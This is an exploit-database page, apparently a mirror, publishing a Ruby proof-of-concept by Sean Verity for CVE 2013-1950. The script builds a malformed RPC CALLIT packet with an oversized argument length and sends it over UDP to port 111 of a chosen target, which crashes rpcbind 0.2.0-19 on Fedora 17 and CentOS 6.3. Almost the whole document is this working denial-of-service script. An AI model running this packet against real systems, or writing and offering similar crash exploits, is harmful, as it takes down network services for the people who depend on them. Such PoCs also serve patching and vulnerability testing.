rpcbind (CALLIT Procedure) UDP Crash PoC
| EKU-ID: 3365 | CVE: | OSVDB-ID: |
| Author: Sean Verity | Published: 2013-07-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 3365 | CVE: | OSVDB-ID: |
| Author: Sean Verity | Published: 2013-07-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/ruby # # rpcbind_udp_crash_poc.rb # 07/15/2013 # Sean Verity <veritysr1980 [at] gmail.com> # CVE 2013-1950 # # rpcbind (CALLIT Procedure) UDP Crash PoC # Affected Software Package: rpcbind-0.2.0-19 # # Tested on: # Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) # CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP) # # rpcbind can be crashed by setting the argument length # value > 8944 in an RPC CALLIT procedure request over UDP. # require 'socket' def usage abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"end if ARGV.length == 1 pkt = [rand(2**32)].pack('N') # XID pkt << [0].pack('N') # Message Type: CALL (0) pkt << [2].pack('N') # RPC Version: 2 pkt << [100000].pack('N') # Program: Portmap (100000) pkt << [2].pack('N') # Program Version: 2 pkt << [5].pack('N') # Procedure: CALLIT (5) pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0) pkt << [0].pack('N') # Length: 0 pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0) pkt << [0].pack('N') # Length: 0 pkt << [0].pack('N') # Program: Unknown (0) pkt << [1].pack('N') # Version: 1 pkt << [1].pack('N') # Procedure: 1 pkt << [8945].pack('N') # Argument Length pkt << "crash" # Arguments s = UDPSocket.new s.send(pkt, 0, ARGV[0], 111) else usage end